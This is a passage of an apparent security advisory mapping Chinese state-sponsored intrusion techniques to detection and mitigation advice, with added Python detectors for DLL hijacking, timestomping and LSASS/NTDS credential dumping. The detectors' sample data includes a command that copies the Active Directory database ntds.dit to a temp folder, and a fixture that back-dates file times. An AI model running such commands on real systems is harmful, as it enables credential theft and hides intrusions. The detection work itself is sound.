\n\nPython\n\n * Audit inventory systems for unauthorized Python installations.\n\n * Blocklist Python where not required.\n\n * Prevent users from installing Python where not required.\n\nJavaScript\n\n * Turn off or restrict access to unneeded scripting components.\n\n * Blocklist scripting where appropriate.\n\n * For malicious code served up through ads, adblockers can help prevent that code from executing.\n\nNetwork Device Command Line Interface (CLI)\n\n * Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.\n\n * Use an authentication, authorization, and accounting (AAA) system to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.\n\n * Ensure least privilege principles are applied to user accounts and groups.\n\n| \n\nHarden: \n\n * Platform Hardening [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * Script Execution Analysis [[D3-SEA](<https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nScheduled Task/Job [[T1053](<https://attack.mitre.org/versions/v9/techniques/T1053>)]\n\n * Cron [[T1053.003](<https://attack.mitre.org/versions/v9/techniques/T1053/003>)]\n * Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v9/techniques/T1053/005>)]\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as `schtasks` or `crontab`, to create and schedule tasks that enumerate victim devices and networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)] and Privilege Escalation 
[[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].

**Detection and mitigation recommendations:**

* Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity.
* Configure event logging for scheduled task creation and monitor process execution from `svchost.exe` (Windows 10) and Windows Task Scheduler (older versions of Windows) to look for changes in `%systemroot%\System32\Tasks` that do not correlate with known software, patch cycles, or other administrative activity. Additionally, monitor for any scheduled tasks created via command line utilities—such as PowerShell or Windows Management Instrumentation (WMI)—that do not conform to typical administrator or user actions.

**Defensive tactics and techniques:**

Detect:

* Platform Monitoring
* Operating System Monitoring [[D3-OSM](<https://d3fend.mitre.org/technique/d3f:OperatingSystemMonitoring>)]
* Scheduled Job Analysis [[D3-SJA](<https://d3fend.mitre.org/technique/d3f:ScheduledJobAnalysis>)]
* System Daemon Monitoring [[D3-SDM](<https://d3fend.mitre.org/technique/d3f:SystemDaemonMonitoring>)]
* System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]

Isolate:

* Execution Isolation
* Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]

#### User Execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204>)]

* Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001>)]
* Malicious File [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience.
These emails may contain a malicious link or file that provides the cyber actor access to the victim's device after the user clicks on the malicious link or opens the attachment.

**Detection and mitigation recommendations:**

* Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.
* Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
* Use a domain reputation service to detect and block suspicious or malicious domains.
* Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
* Ensure all browsers and plugins are kept up to date.
* Use modern browsers with security features turned on.
* Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.

**Defensive tactics and techniques:**

Detect:

* File Analysis
* Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]
* File Content Rules [[D3-FCR](<https://d3fend.mitre.org/technique/d3f:FileContentRules>)]
* Identifier Analysis
* Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]
* URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]
* Network Traffic Analysis
* DNS Traffic Analysis [[D3-DNSTA](<https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis>)]

Isolate:

* Execution Isolation
* Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
* Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
* Network Isolation
* DNS Denylisting
[[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]
* Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]

### Tactics: _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]

_Table V: Chinese state-sponsored cyber actors' Persistence TTPs with detection and mitigation recommendations_

#### Hijack Execution Flow [[T1574](<https://attack.mitre.org/versions/v9/techniques/T1574>)]

* DLL Search Order Hijacking [[T1574.001](<https://attack.mitre.org/versions/v9/techniques/T1574/001>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process.

**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)] and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].

**Detection and mitigation recommendations:**

* Disallow loading of remote DLLs.
* Enable safe DLL search mode.
* Implement tools for detecting search order hijacking opportunities.
* Use application allowlisting to block unknown DLLs.
* Monitor the file system for created, moved, and renamed DLLs.
* Monitor for changes in system DLLs not associated with updates or patches.
* Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).

**Defensive tactics and techniques:**

Detect:

* Platform Monitoring
* Operating System Monitoring
* Service Binary Verification [[D3-SBV](<https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification>)]
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]

Isolate:

* Execution Isolation
* Executable
Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]

#### Modify Authentication Process [[T1556](<https://attack.mitre.org/versions/v9/techniques/T1556>)]

* Domain Controller Authentication [[T1556.001](<https://attack.mitre.org/versions/v9/techniques/T1556/001>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network.

**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)] and Credential Access [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)].

**Detection and mitigation recommendations:**

* Monitor for policy changes to authentication mechanisms used by the domain controller.
* Monitor for modifications to functions exported from authentication DLLs (such as `cryptdll.dll` and `samsrv.dll`).
* Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.
* Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours).
* Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
* Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer.
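Two items in this table can be checked with the same logic: "Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path)" under DLL Search Order Hijacking, and "Monitor for new, unfamiliar DLL files written to a domain controller" just above. The following is an added example, not the advisory's own tooling, that classifies constructed Sysmon-style image-load records (the shape of Sysmon event 7: loading process, loaded DLL, signature status). The list of system DLL names, the set of trusted system directories, the user-writable path fragments and the sample records are all assumptions made for the example; in practice the name list would be generated from a known-good reference host.

```python
from pathlib import PureWindowsPath

# Directories from which the loader is expected to satisfy system DLL names.
# A system DLL name resolved anywhere else is a search-order hijack candidate.
SYSTEM_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64"}
# Constructed baseline of DLL names that belong in System32 on this build
# (cryptdll.dll and samsrv.dll are the two the advisory names; the rest are
# ordinary system libraries added for the example).
SYSTEM_DLL_NAMES = {"ntdll.dll", "kernel32.dll", "version.dll", "cryptdll.dll", "samsrv.dll"}
# Path fragments that mark user- or world-writable locations (assumption).
USER_WRITABLE_HINTS = ("\\users\\", "\\temp\\", "\\programdata\\", "\\downloads\\")


def _name_and_dir(path):
    p = PureWindowsPath(path)
    return p.name.lower(), str(p.parent).lower()


def classify_load(ev):
    """Return the reasons (possibly none) one image-load record is suspicious.
    ev has keys process, dll and signed."""
    reasons = []
    dll_name, dll_dir = _name_and_dir(ev["dll"])
    proc_name, _ = _name_and_dir(ev["process"])
    # Legitimate name, abnormal path: the classic search-order hijack signal.
    if dll_name in SYSTEM_DLL_NAMES and dll_dir not in SYSTEM_DIRS:
        reasons.append("system-dll-name-outside-system-dir")
    # Any DLL loaded from a location ordinary users can write to.
    if any(h in ev["dll"].lower() for h in USER_WRITABLE_HINTS):
        reasons.append("loaded-from-user-writable-path")
    # Unsigned code entering the authentication process is never expected.
    if proc_name == "lsass.exe" and not ev["signed"]:
        reasons.append("unsigned-dll-in-lsass")
    return reasons


def find_hijack_candidates(events):
    """Return the records that tripped at least one check, with the reasons."""
    hits = []
    for ev in events:
        reasons = classify_load(ev)
        if reasons:
            hits.append({"process": ev["process"], "dll": ev["dll"], "reasons": reasons})
    return hits


# Constructed sample records; none of these paths or files are real telemetry.
SAMPLE_LOADS = [
    {"process": "C:\\Program Files\\Vendor\\app.exe",
     "dll": "C:\\Windows\\System32\\version.dll", "signed": True},
    {"process": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\app.exe",
     "dll": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\version.dll", "signed": False},
    {"process": "C:\\Windows\\System32\\lsass.exe",
     "dll": "C:\\Windows\\System32\\samsrv.dll", "signed": True},
    {"process": "C:\\Windows\\System32\\lsass.exe",
     "dll": "C:\\Windows\\Temp\\cryptdll.dll", "signed": False},
    {"process": "C:\\Program Files\\Vendor\\app.exe",
     "dll": "C:\\Program Files\\Vendor\\vendorlib.dll", "signed": True},
]

if __name__ == "__main__":
    for hit in find_hijack_candidates(SAMPLE_LOADS):
        print(hit)
```

The second and fourth records are the ones an analyst would want to see: a copy of `version.dll` sitting next to an executable in a user's temp directory, and an unsigned `cryptdll.dll` loaded into LSASS from `C:\Windows\Temp`. The vendor library loaded from its own program directory is not flagged, which is the false-positive case a name-only rule would trip on.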
* Monitor for and correlate changes to Registry entries.

**Defensive tactics and techniques:**

Detect:

* Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]
* User Behavior Analysis
* Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]
* User Geolocation Logon Pattern Analysis [[D3-UGLPA](<https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis>)]

#### Server Software Component [[T1505](<https://attack.mitre.org/versions/v9/techniques/T1505>)]

* Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks.

**Detection and mitigation recommendations:**

* Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.
* Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.
* Perform integrity checks on critical servers to identify and investigate unexpected changes.
* Have application developers sign their code using digital signatures to verify their identity.
* Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.
* Implement a least-privilege policy on web servers to reduce adversaries' ability to escalate privileges or pivot laterally to other hosts, and control creation and execution of files in particular directories.
* If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.
* Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked.
Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.
* Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.
* Establish, and back up offline, a "known good" version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.
* Employ user input validation to restrict exploitation of vulnerabilities.
* Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.
* Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.

**Defensive tactics and techniques:**

Detect:

* Network Traffic Analysis
* Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]
* Per Host Download-Upload Ratio Analysis [[D3-PHDURA](<https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis>)]
* Process Analysis
* Process Spawn Analysis
* Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]

Isolate:

* Network Isolation
* Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]

#### Create or Modify System Process [[T1543](<https://attack.mitre.org/versions/v9/techniques/T1543>)]

* Windows Service [[T1543.003](<https://attack.mitre.org/versions/v9/techniques/T1543/003>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.

**Note:** this technique also applies to Privilege Escalation
[[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].

**Detection and mitigation recommendations:**

* Only allow authorized administrators to make service changes and modify service configurations.
* Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.
* Monitor WMI and PowerShell for service modifications.

**Defensive tactics and techniques:**

Detect:

* Process Analysis
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]

### Tactics: _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]

_Table VI: Chinese state-sponsored cyber actors' Privilege Escalation TTPs with detection and mitigation recommendations_

#### Domain Policy Modification [[T1484](<https://attack.mitre.org/versions/v9/techniques/T1484>)]

* Group Policy Modification [[T1484.001](<https://attack.mitre.org/versions/v9/techniques/T1484/001>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.

**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].

**Detection and mitigation recommendations:**

* Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.
* Monitor directory service changes using Windows event logs to detect GPO modifications.
Several events may be logged for such GPO modifications.
* Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.

**Defensive tactics and techniques:**

Detect:

* Network Traffic Analysis
* Administrative Network Activity Analysis [[D3-ANAA](<https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis>)]
* Platform Monitoring
* Operating System Monitoring
* System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]

#### Process Injection [[T1055](<https://attack.mitre.org/versions/v9/techniques/T1055>)]

* Dynamic Link Library Injection [[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001>)]
* Portable Executable Injection [[T1055.002](<https://attack.mitre.org/versions/v9/techniques/T1055/002>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors have been observed:

* Injecting into the `rundll32.exe` process to hide usage of Mimikatz, as well as injecting into a running legitimate `explorer.exe` process for lateral movement.
* Using shellcode that injects implants into newly created instances of the Service Host process (`svchost`).

**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].

**Detection and mitigation recommendations:**

* Use endpoint protection software to block process injection based on behavior of the injection process.
* Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes.
Look for DLLs that are not recognized or not normally loaded into a process.
* Monitor for suspicious sequences of Windows API calls such as `CreateRemoteThread`, `VirtualAllocEx`, or `WriteProcessMemory` and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.
* To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need it; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection.

**Defensive tactics and techniques:**

Isolate:

* Execution Isolation
* Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
* Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)]

### Tactics: _Defense Evasion_ [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]

_Table VII: Chinese state-sponsored cyber actors' Defense Evasion TTPs with detection and mitigation recommendations_

#### Deobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v9/techniques/T1140>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.

**Detection and mitigation recommendations:**

* Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.
* Consider blocking, disabling, or monitoring use of 7-Zip.

**Defensive tactics and techniques:**

Detect:

* Process Analysis
* Process
Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]

Isolate:

* Execution Isolation
* Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)]

#### Hide Artifacts [[T1564](<https://attack.mitre.org/versions/v9/techniques/T1564>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.

**Detection and mitigation recommendations:**

* Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.
* Monitor event and authentication logs for records of hidden artifacts being used.
* Monitor the file system and shell commands for hidden attribute usage.

**Defensive tactics and techniques:**

Detect:

* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]

Isolate:

* Execution Isolation
* Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]

#### Indicator Removal from Host [[T1070](<https://attack.mitre.org/versions/v9/techniques/T1070>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors have been observed deleting files using `rm` or `del` commands.
Several files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used.

**Detection and mitigation recommendations:**

* Make the environment variables associated with command history read only to ensure that the history is preserved.
* Recognize timestomping by monitoring the contents of important directories and the attributes of the files.
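As an added example of the "recognize timestomping by monitoring ... the attributes of the files" item (this is not the advisory's own tooling): on Linux and macOS the inode change time (ctime) cannot be set from user space, so a file whose modification time is far older than its ctime, or whose mtime has been rounded to a whole second on a filesystem that keeps nanosecond timestamps, deserves a look. The script builds its own fixture directory with one untouched file and one file back-dated through `os.utime`. The one-day tolerance is an assumption, and both indicators have benign causes (archive extraction, `cp -p`, package installs), so they are triage signals to correlate with the other items in this list, not verdicts.

```python
import os
import tempfile
from datetime import datetime, timezone
from pathlib import Path

NS = 1_000_000_000
BACKDATE_TOLERANCE_S = 24 * 3600  # assumption: mtime more than a day older than ctime


def timestomp_indicators(path):
    """Return the indicators (possibly none) that *path*'s timestamps were
    set by hand. Uses Linux/macOS semantics, where st_ctime is the inode
    change time; on Windows st_ctime is the creation time and this check
    would need a different rule."""
    st = os.stat(path, follow_symlinks=False)
    reasons = []
    # ctime is updated by the kernel whenever mtime is written, so a much
    # older mtime means the modification time was written back after the
    # last real change to the file, which is what timestomping leaves behind.
    if st.st_ctime - st.st_mtime > BACKDATE_TOLERANCE_S:
        reasons.append("mtime-older-than-ctime")
    # Tools that set times from a human-readable date usually produce
    # whole-second values; real writes on ns-precision filesystems rarely do.
    if st.st_mtime_ns % NS == 0:
        reasons.append("whole-second-mtime")
    return reasons


def scan_directory(root):
    """Map file name -> indicators for every flagged regular file under root."""
    hits = {}
    for p in Path(root).rglob("*"):
        if p.is_file():
            reasons = timestomp_indicators(p)
            if reasons:
                hits[p.name] = reasons
    return hits


def build_demo_tree():
    """Constructed fixture: one untouched file and one whose mtime is pushed
    back to 2015 the way a timestomping tool would. Returns the directory."""
    root = tempfile.mkdtemp(prefix="tstomp-")
    Path(root, "notes.txt").write_text("ordinary file\n")
    stomped = Path(root, "dropper.log")
    stomped.write_text("x\n")
    old = int(datetime(2015, 1, 1, tzinfo=timezone.utc).timestamp()) * NS
    os.utime(stomped, ns=(old, old))  # atime and mtime back-dated; ctime stays now
    return root


if __name__ == "__main__":
    for name, reasons in scan_directory(build_demo_tree()).items():
        print(f"{name}: {', '.join(reasons)}")
```

On a real host the scan would run over the directories the table calls "important" (web roots, service binaries, scheduled-task folders, log directories) and the results would be correlated with the file-handle and deletion telemetry from the next items rather than acted on alone.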
* Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their `~/.bash_history` or `ConsoleHost_history.txt` files.
* Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.
* Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise, and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.

**Defensive tactics and techniques:**

Detect:

* Platform Monitoring
* Operating System Monitoring
* System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]

Isolate:

* Execution Isolation
* Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]

#### Obfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v9/techniques/T1027>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.

**Detection and mitigation recommendations:**

Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.

**Defensive tactics and techniques:**

Detect:

* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]

#### Signed Binary Proxy Execution [[T1218](<https://attack.mitre.org/versions/v9/techniques/T1218>)]

* `Mshta` [[T1218.005](<https://attack.mitre.org/versions/v9/techniques/T1218/005>)]
* `Rundll32` [[T1218.011](<https://attack.mitre.org/versions/v9/techniques/T1218/011>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors were observed
using Microsoft signed binaries, such as `Rundll32`, as a proxy to execute malicious payloads.

**Detection and mitigation recommendations:**

Monitor processes for the execution of known proxy binaries (e.g., `rundll32.exe`) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary.

**Defensive tactics and techniques:**

Detect:

* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]

### Tactics: _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)]

_Table VIII: Chinese state-sponsored cyber actors' Credential Access TTPs with detection and mitigation recommendations_

#### Exploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v9/techniques/T1212>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.

**Detection and mitigation recommendations:**

* Update and patch software regularly.
* Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.

**Defensive tactics and techniques:**

Harden:

* Platform Hardening
* Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]
* Credential Hardening
* Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]

#### OS Credential Dumping [[T1003](<https://attack.mitre.org/versions/v9/techniques/T1003>)]

* LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v9/techniques/T1003/001>)]
* NTDS [[T1003.003](<https://attack.mitre.org/versions/v9/techniques/T1003/003>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors were observed targeting the LSASS process or Active Directory (`NTDS.DIT`) for credential dumping.

**Detection and mitigation recommendations:**

* Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the `NTDS.DIT`.
* Ensure that local administrator accounts have complex, unique passwords across all systems on the network.
* Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.
* Consider disabling or restricting NTLM.
* Consider disabling `WDigest` authentication.
* Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).
* Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and has hardware and firmware system requirements.
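An added example, not from the advisory, of the first item above, monitoring process activity indicative of credential dumping: it checks constructed Sysmon-style ProcessAccess (event 10) and ProcessCreate (event 1) records for an unexpected process opening `lsass.exe` with memory-read access, and for command lines that reference `NTDS.DIT`. The allowlist of images permitted to read LSASS, the sample records and their paths are assumptions made for the example; the access-right value is the documented Windows `PROCESS_VM_READ` bit.

```python
PROCESS_VM_READ = 0x0010  # access right any tool reading LSASS memory must hold

# Constructed allowlist: images that legitimately open lsass.exe with read
# access on this build. Build it from your own baseline (EDR/AV, OS components).
LSASS_READ_ALLOWLIST = {"csrss.exe", "wininit.exe", "msmpeng.exe"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return a detection name for one record, or None.
    ProcessAccess records carry source, target and a GrantedAccess mask;
    ProcessCreate records carry image and cmdline."""
    if ev["type"] == "ProcessAccess":
        if (_basename(ev["target"]) == "lsass.exe"
                and ev["access"] & PROCESS_VM_READ
                and _basename(ev["source"]) not in LSASS_READ_ALLOWLIST):
            return "lsass-memory-read"
    elif ev["type"] == "ProcessCreate":
        # Any reference to the AD database outside backup tooling is worth a look.
        if "ntds.dit" in ev["cmdline"].lower():
            return "ntds-dit-reference"
    return None


def find_credential_dumping(events):
    """Return the records that matched, with their position and detection name."""
    hits = []
    for i, ev in enumerate(events):
        name = check_event(ev)
        if name:
            hits.append({"index": i, "detection": name, "event": ev})
    return hits


# Constructed sample records; the paths and command line are not real telemetry.
SAMPLE_EVENTS = [
    {"type": "ProcessAccess", "source": "C:\\Windows\\System32\\csrss.exe",
     "target": "C:\\Windows\\System32\\lsass.exe", "access": 0x1FFFFF},
    {"type": "ProcessAccess", "source": "C:\\ProgramData\\update\\svc.exe",
     "target": "C:\\Windows\\System32\\lsass.exe", "access": 0x1010},
    {"type": "ProcessAccess", "source": "C:\\Program Files\\Monitor\\mon.exe",
     "target": "C:\\Windows\\System32\\lsass.exe", "access": 0x1000},
    {"type": "ProcessCreate", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c copy C:\\Windows\\NTDS\\ntds.dit C:\\Temp\\"},
    {"type": "ProcessCreate", "image": "C:\\Windows\\System32\\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for hit in find_credential_dumping(SAMPLE_EVENTS):
        print(hit["index"], hit["detection"])
```

The third record is deliberately not flagged: access mask `0x1000` is `PROCESS_QUERY_LIMITED_INFORMATION`, which monitoring agents request constantly and which cannot read memory, so alerting on every handle to LSASS would bury the real signal. Protected Process Light and Credential Guard, the next two items in the list, reduce what an unallowlisted reader can obtain even when the detection is late.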
* Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.

**Defensive tactics and techniques:**

Harden:

* Credential Hardening [[D3-CH](<https://d3fend.mitre.org/technique/d3f:CredentialHardening>)]

Detect:

* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
* System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]

Isolate:

* Execution Isolation
* Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
* Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)]

### Tactics: _Discovery_ [[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]

_Table IX: Chinese state-sponsored cyber actors' Discovery TTPs with detection and mitigation recommendations_

#### File and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v9/techniques/T1083>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.

**Detection and mitigation recommendations:**

Monitor processes and command-line arguments for actions that could be taken to gather system and network information.
WMI and PowerShell should also be monitored.

**Defensive tactics and techniques:**

Detect:

* User Behavior Analysis
* Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]
* Process Analysis
* Database Query String Analysis [[D3-DQSA](<https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis>)]
